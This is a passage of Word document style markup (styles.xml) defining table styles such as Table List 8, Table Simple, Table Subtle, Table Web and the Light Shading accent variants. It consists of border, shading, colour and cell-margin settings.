        <w:tcBorders>
          <w:bottom w:val="single" w:color="008000" w:sz="12" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="solid" w:color="C0C0C0" w:fill="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="008000" w:sz="12"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Horz">
      <w:rPr>
        <w:color w:val="auto"/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="pct20" w:color="000000" w:fill="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="pct25" w:color="FFFF00" w:fill="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="140">
    <w:name w:val="Table List 8"/>
    <w:basedOn w:val="106"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:line="300" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tblBorders>
        <w:top w:val="single" w:color="000000" w:sz="6" w:space="0"/>
        <w:left w:val="single" w:color="000000" w:sz="6" w:space="0"/>
        <w:bottom w:val="single" w:color="000000" w:sz="6" w:space="0"/>
        <w:right w:val="single" w:color="000000" w:sz="6" w:space="0"/>
        <w:insideV w:val="single" w:color="000000" w:sz="6" w:space="0"/>
      </w:tblBorders>
      <w:tblLayout w:type="fixed"/>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:i/>
        <w:iCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:bottom w:val="single" w:color="000000" w:sz="6" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="solid" w:color="FFFF00" w:fill="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>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Horz">
      <w:rPr>
        <w:color w:val="auto"/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="pct25" w:color="FFFF00" w:fill="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="pct50" w:color="FF0000" w:fill="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="nwCell">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="single" w:color="auto" w:sz="6" w:space="0"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
        <w:textDirection w:val="lrTb"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="141">
    <w:name w:val="Table Professional"/>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bCs/>
        <w:color w:val="auto"/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="solid" w:color="000000" w:fill="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="142">
    <w:name w:val="Table Simple 1"/>
    <w:basedOn w:val="106"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:line="300" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="auto"/>
    </w:rPr>
    <w:tblPr>
      <w:tblBorders>
        <w:top w:val="single" w:color="008000" w:sz="12" w:space="0"/>
        <w:bottom w:val="single" w:color="008000" w:sz="12" w:space="0"/>
      </w:tblBorders>
      <w:tblLayout w:type="fixed"/>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tcPr>
      <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
    </w:tcPr>
    <w:tblStylePr w:type="firstRow">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:bottom w:val="single" w:color="008000" w:sz="6" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="008000" w:sz="6" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="143">
    <w:name w:val="Table Simple 2"/>
    <w:basedOn w:val="106"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:line="300" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tblLayout w:type="fixed"/>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:bottom w:val="single" w:color="000000" w:sz="12" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="auto"/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="000000" w:sz="6" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:right w:val="single" w:color="000000" w:sz="12" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:left w:val="single" w:color="000000" w:sz="6" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="neCell">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:left w:val="nil"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="swCell">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="nil"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="144">
    <w:name w:val="Table Simple 3"/>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cPr>
      <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
    </w:tcPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="FFFFFF"/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="solid" w:color="000000" w:fill="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="145">
    <w:name w:val="Table Subtle 1"/>
    <w:basedOn w:val="106"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:line="300" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tblLayout w:type="fixed"/>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="000000" w:sz="6" w:space="0"/>
          <w:bottom w:val="single" w:color="000000" w:sz="12" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="000000" w:sz="12" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="pct25" w:color="800080" w:fill="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:right w:val="single" w:color="000000" w:sz="12" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:left w:val="single" w:color="000000" w:sz="12" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:bottom w:val="single" w:color="000000" w:sz="6" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="pct25" w:color="8080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46">
    <w:name w:val="Table Subtle 2"/>
    <w:basedOn w:val="106"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:line="300" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tblBorders>
        <w:left w:val="single" w:color="000000" w:sz="6" w:space="0"/>
        <w:right w:val="single" w:color="000000" w:sz="6" w:space="0"/>
      </w:tblBorders>
      <w:tblLayout w:type="fixed"/>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:bottom w:val="single" w:color="000000" w:sz="12" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="000000" w:sz="12" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:right w:val="single" w:color="000000" w:sz="12" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="pct25" w:color="008000" w:fill="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:left w:val="single" w:color="000000" w:sz="12" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="pct25" w:color="8080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47">
    <w:name w:val="Table Theme"/>
    <w:basedOn w:val="106"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:line="30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table" w:styleId="148">
    <w:name w:val="Table Web 1"/>
    <w:basedOn w:val="106"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:line="300" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="auto"/>
    </w:rPr>
    <w:tblPr>
      <w:tblCellSpacing w:w="20" w:type="dxa"/>
      <w:tblBorders>
        <w:top w:val="outset" w:color="auto" w:sz="6" w:space="0"/>
        <w:left w:val="outset" w:color="auto" w:sz="6" w:space="0"/>
        <w:bottom w:val="outset" w:color="auto" w:sz="6" w:space="0"/>
        <w:right w:val="outset" w:color="auto" w:sz="6" w:space="0"/>
        <w:insideH w:val="outset" w:color="auto" w:sz="6" w:space="0"/>
        <w:insideV w:val="out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blPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="149">
    <w:name w:val="Table Web 2"/>
    <w:basedOn w:val="106"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:line="300" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="auto"/>
    </w:rPr>
    <w:tblPr>
      <w:tblCellSpacing w:w="20" w:type="dxa"/>
      <w:tblBorders>
        <w:top w:val="inset" w:color="auto" w:sz="6" w:space="0"/>
        <w:left w:val="inset" w:color="auto" w:sz="6" w:space="0"/>
        <w:bottom w:val="inset" w:color="auto" w:sz="6" w:space="0"/>
        <w:right w:val="inset" w:color="auto" w:sz="6" w:space="0"/>
        <w:insideH w:val="inset" w:color="auto" w:sz="6" w:space="0"/>
        <w:insideV w:val="in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blPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="150">
    <w:name w:val="Table Web 3"/>
    <w:basedOn w:val="106"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:line="300" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="auto"/>
    </w:rPr>
    <w:tblPr>
      <w:tblCellSpacing w:w="20" w:type="dxa"/>
      <w:tblBorders>
        <w:top w:val="outset" w:color="auto" w:sz="24" w:space="0"/>
        <w:left w:val="outset" w:color="auto" w:sz="24" w:space="0"/>
        <w:bottom w:val="outset" w:color="auto" w:sz="24" w:space="0"/>
        <w:right w:val="outset" w:color="auto" w:sz="24" w:space="0"/>
        <w:insideH w:val="outset" w:color="auto" w:sz="6" w:space="0"/>
        <w:insideV w:val="out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blPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="151">
    <w:name w:val="Light Shading"/>
    <w:basedOn w:val="106"/>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blLayout w:type="fixed"/>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BFBFBF" w:themeFill="text1" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:left w:val="nil"/>
          <w:right w:val="nil"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="text1" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="152">
    <w:name w:val="Light Shading Accent 1"/>
    <w:basedOn w:val="106"/>
    <w:uiPriority w:val="60"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="577289" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
    <w:tblPr>
      <w:tblBorders>
        <w:top w:val="single" w:color="7E97AD" w:themeColor="accent1" w:sz="8" w:space="0"/>
        <w:bottom w:val="single" w:color="7E97AD" w:themeColor="accent1"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7E97AD" w:themeColor="accent1" w:sz="8" w:space="0"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="single" w:color="7E97AD" w:themeColor="accent1" w:sz="8" w:space="0"/>
          <w:right w:val="nil"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="7E97AD" w:themeColor="accent1" w:sz="8" w:space="0"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="single" w:color="7E97AD" w:themeColor="accent1"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DFE5EA" w:themeFill="accent1" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:left w:val="nil"/>
          <w:right w:val="nil"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="DFE5EA" w:themeFill="accent1" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="153">
    <w:name w:val="Light Shading Accent 2"/>
    <w:basedOn w:val="106"/>
    <w:uiPriority w:val="60"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="AA6837" w:themeColor="accent2" w:themeShade="BF"/>
    </w:rPr>
    <w:tblPr>
      <w:tblBorders>
        <w:top w:val="single" w:color="CC8E60" w:themeColor="accent2" w:sz="8" w:space="0"/>
        <w:bottom w:val="single" w:color="CC8E60" w:themeColor="accent2"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CC8E60" w:themeColor="accent2" w:sz="8" w:space="0"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="single" w:color="CC8E60" w:themeColor="accent2" w:sz="8" w:space="0"/>
          <w:right w:val="nil"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="CC8E60" w:themeColor="accent2" w:sz="8" w:space="0"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="single" w:color="CC8E60" w:themeColor="accent2"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F2E3D7" w:themeFill="accent2" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:left w:val="nil"/>
          <w:right w:val="nil"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="F2E3D7" w:themeFill="accent2" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="154">
    <w:name w:val="Light Shading Accent 3"/>
    <w:basedOn w:val="106"/>
    <w:uiPriority w:val="60"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="5C5048" w:themeColor="accent3" w:themeShade="BF"/>
    </w:rPr>
    <w:tblPr>
      <w:tblBorders>
        <w:top w:val="single" w:color="7A6A60" w:themeColor="accent3" w:sz="8" w:space="0"/>
        <w:bottom w:val="single" w:color="7A6A60" w:themeColor="accent3"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7A6A60" w:themeColor="accent3" w:sz="8" w:space="0"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="single" w:color="7A6A60" w:themeColor="accent3" w:sz="8" w:space="0"/>
          <w:right w:val="nil"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="7A6A60" w:themeColor="accent3" w:sz="8" w:space="0"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="single" w:color="7A6A60" w:themeColor="accent3"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DFD9D6" w:themeFill="accent3" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:left w:val="nil"/>
          <w:right w:val="nil"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="DFD9D6" w:themeFill="accent3" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="155">
    <w:name w:val="Light Shading Accent 4"/>
    <w:basedOn w:val="106"/>
    <w:uiPriority w:val="60"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="8F6F4A" w:themeColor="accent4" w:themeShade="BF"/>
    </w:rPr>
    <w:tblPr>
      <w:tblBorders>
        <w:top w:val="single" w:color="B4936D" w:themeColor="accent4" w:sz="8" w:space="0"/>
        <w:bottom w:val="single" w:color="B4936D" w:themeColor="accent4"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B4936D" w:themeColor="accent4" w:sz="8" w:space="0"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="single" w:color="B4936D" w:themeColor="accent4" w:sz="8" w:space="0"/>
          <w:right w:val="nil"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="B4936D" w:themeColor="accent4" w:sz="8" w:space="0"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="single" w:color="B4936D" w:themeColor="accent4"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ECE4DA" w:themeFill="accent4" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:left w:val="nil"/>
          <w:right w:val="nil"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="ECE4DA" w:themeFill="accent4" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="156">
    <w:name w:val="Light Shading Accent 5"/>
    <w:basedOn w:val="106"/>
    <w:uiPriority w:val="60"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="4D5A5C" w:themeColor="accent5" w:themeShade="BF"/>
    </w:rPr>
    <w:tblPr>
      <w:tblBorders>
        <w:top w:val="single" w:color="67787B" w:themeColor="accent5" w:sz="8" w:space="0"/>
        <w:bottom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67787B" w:themeColor="accent5" w:sz="8" w:space="0"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="single" w:color="67787B" w:themeColor="accent5" w:sz="8" w:space="0"/>
          <w:right w:val="nil"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="67787B" w:themeColor="accent5" w:sz="8" w:space="0"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="single" w:color="67787B" w:themeColor="accent5"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D8DEDF" w:themeFill="accent5" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:left w:val="nil"/>
          <w:right w:val="nil"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="D8DEDF" w:themeFill="accent5" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="157">
    <w:name w:val="Light Shading Accent 6"/>
    <w:basedOn w:val="106"/>
    <w:uiPriority w:val="60"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="786F51" w:themeColor="accent6" w:themeShade="BF"/>
    </w:rPr>
    <w:tblPr>
      <w:tblBorders>
